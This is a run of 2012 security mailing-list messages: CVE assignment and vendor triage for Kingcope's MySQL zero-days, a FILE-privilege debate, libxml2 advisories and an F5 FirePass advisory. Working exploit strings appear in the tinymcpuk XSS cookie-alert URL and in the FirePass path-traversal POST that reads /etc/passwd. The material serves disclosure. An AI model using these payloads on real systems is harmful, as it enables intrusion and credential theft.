OFZV8ivkDWFZCSAPrkjN+6kOHVQ+9OVrzQ8yX8YnxxKmVrPJm/smCFhpg63WQ6bX ebIs8bjpedpSCKiZQH7pDslapELwKB8jQNksAfI38IZjz/lq7HMzDHPXnp3ns5gE A6+yJOsM2mDjFQtHdN/RVjVqqiE1c3bTHc3FYJ1H5i4AHaq2VHEt53TsATOwmWaE Ph6KeHNiXB0oVSOnREbRT+zjiygQgf3d6O+EHywdqA2jShEL/cYRUc+6AAhAteqY 9YWL7vJdr+Rz95g5YBMQ8/HNmakMX/7ZgW09EVj27KuaCtsjAOUJSNL2smGSvIRK 1waxZDl43cXQate+1+sYDteYya22kz15Cp9AJoxHJR+pFyNVTDp5lRH5BmfjKcUi QcHoHPRZ5mIySw1no74HNki3WYCQUlMqKH+v6eZxGXhr5X5hUW3ArJzVrlaKeOEG 1VlWuD+c6SDBtnjS8+m5SqdL6nM2dRr6DcO5M6lB5tcqcowNSstphl8uCM2gBQ3S 49cJjvgFAdHE4MFIE4lR =BVqr -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Please use CVE-2012-5613 for MySQL (Linux) Database Privilege Elevation Zeroday Exploit - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvFXAAoJEBYNRVNeJnmTmIIP/ibqLe92YFPGEYCJbAReXjOl GrtUPHhqJ6d1vQ01UFMDhPwqAhdOq5mGH+FBrt6aaDyQZQijRzmQVtaneRe+c4o1 5txCdF3X/SwGv7MIBbBMCHztZynkDNQ/a68JIkNjJ7hWuE5carmhogYtzoNmhUxF n3k11HUsNTcMwgN/RUCjab4tKKTn1HlJB8M+KL+v36DM3M7UCjErUk/upVeJoaK7 7ATANDzlURc9W/YfcDNWZIhzPL3AMF4+4oLc9Qc2TMqjKn+WzLCgfGV9sBSujImk dod1bbKZ7efDPYP48EsYW34xg/jc6bw4RW3YaxypeQ23G/QSgnRzunJJu4LeCycw 7Sg7b+Sy8FRxGjhztf4hSCXvn6Hplnlt+uzrvjL6YVFt1MwGVIgiRN/0WoiFp/HH Su6uodLiA1M0QrTCYYrTe5G8aZ4DAuHbkmWetm7BrTwXyqfqXVtENBgLPWp5JOuS WpFpMFbLqe8tm+x+UqaCTRoBhahovwURkM2+micSdiXmRW9KSOH+2sAj0ewcPL4V rpLrrDym7nnvCRa6R5pxeC8aN0nayWbPyR1VUULLfg5vKLH9/lgnA5NahLAcI228 kMgXDlAUOQo86sE7sBE+5dmu3qYKdKMiy174odz/MbnHdWpIV1j9zeVPbfTqHFG+ OyZokNeRbwFhefCGhH3g =lO/R -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL Denial of Service Zeroday PoC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Please use CVE-2012-5614 for MySQL Denial of Service Zeroday PoC - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvHQAAoJEBYNRVNeJnmTJUAQAKe6OGh+OnqVL1imsc0P5zaU PTiEykeuN0nQ0yU22U5GQBOXbiSlWfTp/N9sn7m7HqxN4NRvLiNtRFZdhrXf0rah cTimkN0r8JGoP1KRSSOYJt+vnUK70YlwpxT1ZsbahSnDwWWmv4Fe1ry2Ocn8b8o8 uTDU3MOgbfmEhZyxRAkNlo8JvSIVFUdIxAbsJYeIbVjCo6pv7U+EBCX+5DXiPdb1 xOYD0kkvw2QCRyBPtpEiem/3EdTfCC8GHLchx/jup61/bKTkM3d0ecg9ISBEN9kU KvYHDc3OthR9XRQ5UKOT3PZHb5D9PPN0d3wV0KeA4S43gDCSyWeeLXHi/DhWYR4M olELLySdO3SQRO1sAUMVAbQxjtvYw8Yms6lJj5Dj0jWN9Kl3aRfJY7wwApZ1I/G7 Lm/t6ibC+U5Xt7+PjuQlFE5ZyBp5KpkBcYbdChzxtoHVmhtEzHiP5q62zeIUPG6G Evvws8vLsMvpIsJcUC13NbcoQ7NLpSOvpgNYiMEqrA3N7fd4M3NH/uims5wSmAWO H/Sq5UdqcGehkdc3Hh363bJF5UEn9snlWPYUvI0ccrbxdzOYZiHveWA0fpznKkRX bLyBegkbcZf247bC0gJQkPuB6D6zfjKFJv3Y+ZktOZBAW6uixJI3YlMQfVcCz7Bk vj2ZuZVLKiwkWPsO93qI =TZ5A -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL Remote Preauth User Enumeration Zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Please use CVE-2012-5615 for MySQL Remote Preauth User Enumeration Zeroday - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvILAAoJEBYNRVNeJnmTq4EP/1q0N43gHEOJuaPh3bbhxKbV OHbkrZs0vUG+FFeEJyne0REvrTZmtG3a6eqS2kx/w8Q1kYMLSKcr2uFst9wNmoY0 CD8jF9vXiS8gGag8OmYyJWMCjNvU8e1BOlny2gJ9daLzauFXPW2OoKVbPDP79hxx mbnX+jMrddhRgM1zZARYvx1/r9CuyjHLiRVDOBfLhErGGDAq2CqzRQubAZ0F+cx2 wW6UsdR7FOqzxso4TuKHf+Nvcfy9mShTOfWHVj4KwhemVr/yIDMdtkXlne8xfa29 HP+kHv7miOXdavH5Q6w781D+54F+QEzHnou2/Vbkj/11Cs5J6a10/caJct5JSIWJ bH901vvroVCofABEPA5z2h9h51/6PWQpgJmQUmxIyyX66+JKQwaG6pGtP4y9wcpf OSeA3SnyRSN7XVrCySjMRt2WVnXcErXHCUNTKpmypG1pj5eGxLy+hGJCvr4v58Uw h1W/9gkkqyhO7e0LApob7kqG2byfEsBmF4T26CPBHkHDkw+89Hs4ePAbzEI+lwvf /iImwWQC+FnG4w1+bL+BJroXevqtA45H79mrGjQkTEzEnXxst+R8i++NcoBTaWDY ABK6XWm2toq+omjkFqlaP2BSD32raVQ1QnJ+utMrCEdl7quIiDs94tV1pz+bWz0g kXLnnG3gByi3oPegh09a =Var9 -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 11:41 AM, king cope wrote: *** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Cheerio, Kingcope So in the case of this issue it appears to be documented (UDF, do not run MySQL as administrator, etc.). As I understand CVE assignment rules this issue does not require a CVE, however just to be on the safe side I'm CC'ing MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvLHAAoJEBYNRVNeJnmT9qkQAJQpvJbzLGsgqaX514YqIdIv cxa7hjTeTEJQk6M9Do2QRdzUekUqNc6rAVW06TAnnSjE1aBoiFmpKqr38VzD/7BX 27ZuSpEPHeVYqKwruMzmV51b/0/4C5TqVRhgC5vxW9iXHUp2srKvaSxYlnZ6aRg4 R8vXbYc+FDW2T5bL0EFe0YTRnzKAyvvrAVsbKfI0iQZ/oVvOZcZ7k4HEyhfphzCZ rQuMkJMKYJ1VnzbWN1UWihWq3YF9Ciusw1wGJu4dLjjoMGzZvLZh3s6WzoITRA2y TAxAAa/40ZfF1ONJQ0/SKCGsQtABJiT0PXVB9jBLwnLsHYAXgLzz200vn2DvOz/g dNHj17gcBlyIlTJfYHvnRw5F0igixTevDI6QxsefrECFJOs5zCFaiB71jcrMVOAT PLyapA4+oJdtpPgIwF3CozwzVpRSZmJ9fjkJEpVWjZP3TZGM94Xm+B/tlGrrzCSr zM2hBG3JRAoCNW48Wdf0MLe6FEAHoQSGVqBVmjqjohPqQ1eoJXOoz0xl6NsD5HRb VQJsx9G1L8u6T0F4C8cC6v+QJKASF+/ZxLfprU8W8IuZZ9CmVxoMht0Ny82nnKkc MdezH/13+WfmuAZ+yxtRgC7h5pHN3phSKFVlNiGm07hlnFW0igwGi176xTo/pX3K 0WF2FT8pjtvcglpV+uez =JAto -END PGP SIGNATURE-
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. Sorry forgot the CVE the first time: Please use CVE-2012-5611 for MySQL (Linux) Stack based buffer overrun PoC Zeroday - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQuvaJAAoJEBYNRVNeJnmTAMYP/Rcnlwbcl0ltQRYLJ1QrGRDw vYNB1mcNdEHxdm0oT5O/Ni97IZUGRi+Xdg3Ed3TOm/17Xpx2AHN0MsLJT6Agp7fZ 2KwZnq/aD891+bnj7AtcUz/uz3r/fqsJ0uSPdY6dDAQQHD0No92MDnCCZbfRgW50 7/XoNGEUhVjVmTDSwj2s8GatrP76F7SwrJu49fomEvNsyJrKYn0V9rEYoOO8aohz OKLgj9ny38mTIlKXISCBMGHdcYWpjAjR/uDd+uxK5Wez907nfjSchvCDJLIRW8wY um2/sXL976LHowetAt6JmXZCUQKQi/QnFiCHnuBtYrdh531pIFAh563e5IYBXKOc /YbpE8ZtYC3P9Cc31B8HAGHWnPTrYo8LyobxFNpoKeAb8b/z2ygOV/000Eop6wfB r9OzD8z3N7Egn6NxAXBfUb2MP+YRZTBlLWkgIjE6LyE/AHVX7h7l+cXp4E01ZFfx gpBA/jbsgFM2ECx2logK6k49a4WmW2IQ+zjbg3TPYBCyrffsAyfUiIAj89jYjLG4 DTDeN2n7rtoluecjbJrQUkAk/C50yMv0tmfHtTxmfcxh+W+sl8X91LTWpTLpSKGI lhfDW/5ZsvZ5qizEeR3VHTiXhIGyqk3hf+hHDpOlh2S79rhlPqNoXvCKiuMs9zeW ajNkKDLhoKOmlCPbsCVE =UJUX -END PGP SIGNATURE-
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, Kurt! This is CVE-2012-5579 that we've been discussing recently. A test case it different, but it triggers exactly the same code. MariaDB is not vulnerable as of 5.1.66, 5.2.13, 5.3.11, 5.5.28a. Latest released MySQL versions are still affected, but Oracle knows about this issue, so next versions won't be. Regards, Sergei MariaDB Security Coordinator On Dec 01, Kurt Seifried wrote: On 12/01/2012 02:26 PM, king cope wrote: (see attachment) Cheerio, Kingcope So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on. http://seclists.org/fulldisclosure/2012/Dec/4
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
On 12/02/2012 11:30 AM, Kurt Seifried wrote: So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure. So here are the CVEs which Kurt meant to assign, but somehow that mail never reached the lists. * CVE-2012-5611 MySQL (Linux) Stack based buffer overrun PoC Zeroday http://seclists.org/fulldisclosure/2012/Dec/4 https://bugzilla.redhat.com/show_bug.cgi?id=882599 * CVE-2012-5612 MySQL (Linux) Heap Based Overrun PoC Zeroday http://seclists.org/fulldisclosure/2012/Dec/5 https://bugzilla.redhat.com/show_bug.cgi?id=882600 * CVE-2012-5613 MySQL (Linux) Database Privilege Elevation Zeroday Exploit http://seclists.org/fulldisclosure/2012/Dec/6 https://bugzilla.redhat.com/show_bug.cgi?id=882606 * CVE-2012-5614 MySQL Denial of Service Zeroday PoC http://seclists.org/fulldisclosure/2012/Dec/7 https://bugzilla.redhat.com/show_bug.cgi?id=882607 * CVE-2012-5615 MySQL Remote Preauth User Enumeration Zeroday http://seclists.org/fulldisclosure/2012/Dec/9 https://bugzilla.redhat.com/show_bug.cgi?id=882608 -- Huzaifa Sidhpurwala / Red Hat Security Response Team
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, Huzaifa! Here's the vendor's reply: On Dec 02, Huzaifa Sidhpurwala wrote: * CVE-2012-5611 MySQL (Linux) Stack based buffer overrun PoC Zeroday http://seclists.org/fulldisclosure/2012/Dec/4 https://bugzilla.redhat.com/show_bug.cgi?id=882599 A duplicate of CVE-2012-5579 Already fixed in all stable MariaDB version. * CVE-2012-5612 MySQL (Linux) Heap Based Overrun PoC Zeroday http://seclists.org/fulldisclosure/2012/Dec/5 https://bugzilla.redhat.com/show_bug.cgi?id=882600 Acknowledged. https://mariadb.atlassian.net/browse/MDEV-3908 * CVE-2012-5613 MySQL (Linux) Database Privilege Elevation Zeroday Exploit http://seclists.org/fulldisclosure/2012/Dec/6 https://bugzilla.redhat.com/show_bug.cgi?id=882606 Not a bug. MySQL manual specifies many times very explicitly: === * Do not grant the `FILE' privilege to nonadministrative users. Any user that has this privilege can write a file anywhere in the file system with the privileges of the *Note `mysqld': mysqld. daemon. To make this a bit safer, files generated with *Note `SELECT ... INTO OUTFILE': select. do not overwrite existing files and are writable by everyone. The `FILE' privilege may also be used to read any file that is world-readable or accessible to the Unix user that the server runs as. With this privilege, you can read any file into a database table. This could be abused, for example, by using *Note `LOAD DATA': load-data. to load `/etc/passwd' into a table, which then can be displayed with *Note `SELECT': select. === You should exercise particular caution in granting the `FILE' and administrative privileges: * The `FILE' privilege can be abused to read into a database table any files that the MySQL server can read on the server host. This includes all world-readable files and files in the server's data directory. The table can then be accessed using *Note `SELECT': select. to transfer its contents to the client host. === Additionally, MySQL (and MariaDB) provides a --secure-file-priv option that allows to restrict all FILE operations to a specific directory. Thus, CVE-2012-5613 is not a bug, but a result of a misconfiguration, much like an anonymous ftp upload access to the $HOME of the ftp user. * CVE-2012-5614 MySQL Denial of Service Zeroday PoC http://seclists.org/fulldisclosure/2012/Dec/7 https://bugzilla.redhat.com/show_bug.cgi?id=882607 Acknowledged. https://mariadb.atlassian.net/browse/MDEV-3910 * CVE-2012-5615 MySQL Remote Preauth User Enumeration Zeroday http://seclists.org/fulldisclosure/2012/Dec/9 https://bugzilla.redhat.com/show_bug.cgi?id=882608 This is hardly a zeroday issue, it was known for, like, ten years. But I'll see what we can do here. https://mariadb.atlassian.net/browse/MDEV-3909 Regards, Sergei MariaDB Security Coordinator
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
On dim., 2012-12-02 at 21:17 +0100, king cope wrote: My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges seperated when with this exploit FILE privileges equate to ALL ADMIN privileges. Maybe because you might not want admins to have read/write access to the filesystem anyway? Regards, -- Yves-Alexis signature.asc Description: This is a digitally signed message part
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Correct, I tell that from experience because I've seen many configurations where the least privileged user has file privs enabled. If we leave it that way the attackers will be more happy, it's not decision to patch it or not, just a hint . Regard, Kingcope 2012/12/2 Yves-Alexis Perez cor...@debian.org: On dim., 2012-12-02 at 21:17 +0100, king cope wrote: My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges seperated when with this exploit FILE privileges equate to ALL ADMIN privileges. Maybe because you might not want admins to have read/write access to the filesystem anyway? Regards, -- Yves-Alexis
[SECURITY] [DSA 2580-1] libxml security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2580-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff December 02, 2012 http://www.debian.org/security/faq - - Package: libxml2 Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE ID : CVE-2012-5134 Jueri Aedla discovered a buffer overflow in the libxml XML library, which could result in the execution of arbitrary code. For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze6. For the unstable distribution (sid), this problem has been fixed in version 2.8.0+dfsg1-7. We recommend that you upgrade your libxml2 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlC7v+YACgkQXm3vHE4uylrnRwCgoiHd8YRYurlOhNb0+pjQQ1In ZwoAn3nI0j2fPqx8IfpD7fVkK3FAYKEm =a85v -END PGP SIGNATURE-
[ MDVSA-2012:176 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:176 http://www.mandriva.com/security/ ___ Package : libxml2 Date: December 2, 2012 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability was found and corrected in libxml2: A heap-buffer overflow was found in the way libxml2 decoded certain XML entitites. A remote attacker could provide a specially-crafted XML file, which once opened in an application linked against libxml would cause that application to crash, or, potentially, execute arbitrary code with the privileges of the user running the application (CVE-2012-5134). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5134 ___ Updated Packages: Mandriva Linux 2011: b77de360ca61239e7b28f0ecc046a8df 2011/i586/libxml2_2-2.7.8-6.8-mdv2011.0.i586.rpm e7242a7bb8c253caed9a1e31dc13a91f 2011/i586/libxml2-devel-2.7.8-6.8-mdv2011.0.i586.rpm 9cd0fd59447fac1f0e3a8fdf953a3d38 2011/i586/libxml2-python-2.7.8-6.8-mdv2011.0.i586.rpm 9004f9264ec86f2f8ec402e7782fe079 2011/i586/libxml2-utils-2.7.8-6.8-mdv2011.0.i586.rpm e164bcea2d67fc4f565b78b40d6ffdd7 2011/SRPMS/libxml2-2.7.8-6.8.src.rpm Mandriva Linux 2011/X86_64: 3f04ec8d2e1a85598b17237f8a2ac9b8 2011/x86_64/lib64xml2_2-2.7.8-6.8-mdv2011.0.x86_64.rpm 0fa0d04eef390f3f99310294c5464c66 2011/x86_64/lib64xml2-devel-2.7.8-6.8-mdv2011.0.x86_64.rpm 624573d764b618c19cb24071e1b9b3d1 2011/x86_64/libxml2-python-2.7.8-6.8-mdv2011.0.x86_64.rpm d654460ab7a2556d14aeb7df74fd0eee 2011/x86_64/libxml2-utils-2.7.8-6.8-mdv2011.0.x86_64.rpm e164bcea2d67fc4f565b78b40d6ffdd7 2011/SRPMS/libxml2-2.7.8-6.8.src.rpm Mandriva Enterprise Server 5: cf6c7e82a296e5e05aea67a4c163326d mes5/i586/libxml2_2-2.7.1-1.14mdvmes5.2.i586.rpm 9faf040efb0aa5ca173b25c52ff92a93 mes5/i586/libxml2-devel-2.7.1-1.14mdvmes5.2.i586.rpm 06cd79c7ab5a8217b3dbe8b50a542ab6 mes5/i586/libxml2-python-2.7.1-1.14mdvmes5.2.i586.rpm 7304980efce76b79cf9d81e8d03b6271 mes5/i586/libxml2-utils-2.7.1-1.14mdvmes5.2.i586.rpm 6917e3c972fa5e115766c7c8395a47e6 mes5/SRPMS/libxml2-2.7.1-1.14mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 63463113fd1d520b864e96429ab2c79a mes5/x86_64/lib64xml2_2-2.7.1-1.14mdvmes5.2.x86_64.rpm 7990c8354872ac1559040a64436fca79 mes5/x86_64/lib64xml2-devel-2.7.1-1.14mdvmes5.2.x86_64.rpm 46f79f00ea4d2d1fbf130ef30c6bb93b mes5/x86_64/libxml2-python-2.7.1-1.14mdvmes5.2.x86_64.rpm 6b8aa5a433ed9ecad1b5a2bc8972b93f mes5/x86_64/libxml2-utils-2.7.1-1.14mdvmes5.2.x86_64.rpm 6917e3c972fa5e115766c7c8395a47e6 mes5/SRPMS/libxml2-2.7.1-1.14mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQu6B/mqjQ0CJFipgRAgN/AJ0VQWb9bOhKFa4Y4yElsZvjvLxVjQCcD9X5 E1vY658q8IAQyMqNmQuYciA= =E8kB -END PGP SIGNATURE-
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, king cope! On Dec 02, king cope wrote: Hi, My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges seperated when with this exploit FILE privileges equate to ALL ADMIN privileges. I understand that it's insecure to have FILE privileges attached to a user. But if this a configuration issue and not a vulnerability then as stated above there must be something wrong with the privilege management in this SQL server. You've missed that part of my reply: Additionally, MySQL (and MariaDB) provides a --secure-file-priv option that allows to restrict all FILE operations to a specific directory. Normally, if a DBA wants to grant FILE privilege to users, the server will have something like secure-file-priv=/tmp/mysql (for example) specified in the configuration file. This way any operation allowed by the FILE privilege (like SELECT ... OUTFILE) will only be able to access files under the /tmp/mysql/ path. Regards, Sergei
tinymcpuk xss vulnerability
= tinymcpuk xss vulnerability = # Exploit Title: tinymcpuk xss vulnerability # Google Dork: n/a # Date: 1/12/2012 (GMT+7) # Exploit Author: eidelweiss (@randyarios) # Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/ # Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/ # Version: 0.3 # Tested on: windows Ubuntu Linux [!] about TinyMCPUK - TinyMCE with file/image manager. TinyMCPUK brings you the powerful TinyMCE plus the MCPUK file manager and ImageManager strictly integrated together. [!] exploit p0c /tinymcpuk/filemanager/connectors/php/connector.php?test=h1p0c/h1xss=scriptalert(document.cookie)/script [!] sample poc http://host/filemanager/connectors/php/connector.php?test=h1p0c/h1xss=scriptalert(document.cookie)/script ==| -=[ E0F ]=- |== Nb: Graatz to om wenk and all DC member.. sorry om Suntuk banget gue wkakwakwkawk.. bavod!!!
SEC Consult SA-20121203-0 :: F5 FirePass SSL VPN Unauthenticated local file inclusion
SEC Consult Vulnerability Lab Security Advisory 20121203-0 === title: Unauthenticated local file inclusion product: F5 FirePass SSL VPN vulnerable version: = 7.0.0 HF-70-6 fixed version: 7.0.0 HF-70-7 impact: Critical homepage: http://www.f5.com found: 2012-06-01 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor/product description: - The FirePass SSL VPN available as an appliance and in a Virtual Edition provide security, flexibility, and ease of use. It grants access to corporate applications using a technology that everyone understands: a web browser. Users can have secure access from anywhere they have an Internet connection, while FirePass ensures that connected computers are fully patched and protected. FirePass provides robust, secure SSL VPN remote access to business applications from a wide range of client devices, including Apple iPhone and Windows Mobile devices. Using full-tunnel SSL technology and client access policies defined by system administrators, remote clients can log on to corporate business applications under pre-defined access permissions and client directory control. URL: http://www.f5.com/products/firepass/ Vulnerability overview/description: --- Due to insufficient input validation, an unauthenticated attacker can disclose arbitrary local files with the privileges of the webserver. This includes the user/administrator database. As the attacker-controlled path is passed to the PHP include() function, code execution is also possible. Furthermore, the path is then passed to the unlink() function and therefore can be used to delete arbitrary files in the filesystem which causes denial of service. As opposed to some information on the Internet (e.g. https://twitter.com/FirePassHF/status/218886584672587776), it is not necessary to have Citrix functionality enabled in order to exploit this vulnerability. Proof of concept: - The flaw exists in the CitrixAuth.php script in the parameter sessionId. An attacker can traverse directories with '../' and terminate the path with a NULL byte. The following exploit shows how files can be extracted from the file system: POST /CitrixAuth.php HTTP/1.1 Host: hostname Content-Type: application/none Content-Length: 68 sessionId../../../../../etc/passwd /sessionId - - NULL byte Vulnerable / tested versions: - The vulnerability has been verified to exist in the Firepass SSL VPN version 7.0.0, which was the most recent version at the time of discovery. Vendor contact timeline: 2012-06-05: Contacting vendor security team via email. 2012-06-07: Response from vendor. 2012-06-12: Coordination call with vendor. 2012-06-14: Sent proof of concept exploit via encrypted channel. 2012 June: Vendor releases HF-388207-1 and informs that solution (=advisory) will be published soon. 2012-08-22: Requesting status of solution. 2012-08-22: Vendor responds that solution will be published soon. 2012-10-23: Requesting status of solution. 2012-10-23: Vendor responds that something went wrong and they will look into it. 2012-11-07: Requesting status of solution. 2012-11-29: Vendor publishes SOL14046. 2012-12-03: Public release of SEC Consult advisory. Solution: - Apply HF-70-7 or HF-388207-1. For detailed information see: http://support.f5.com/kb/en-us/solutions/public/14000/000/sol14046.html Patch information is also available at: http://support.f5.com/kb/en-us/solutions/public/13000/800/sol13826.html Workaround: --- No workaround available. Advisory URL: -- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehböck / @2012
Re: phpGiftReq SQL Injection
All SQL queries have been replaced with parameterized statements in version 2.0.0.